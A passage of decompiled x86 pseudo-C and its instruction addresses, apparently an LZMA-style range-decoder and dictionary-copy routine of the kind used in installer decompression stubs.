												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406bab
                                                    0x00406bb1
                                                    0x00406bc3
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406b7f
                                                    0x00406b85
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
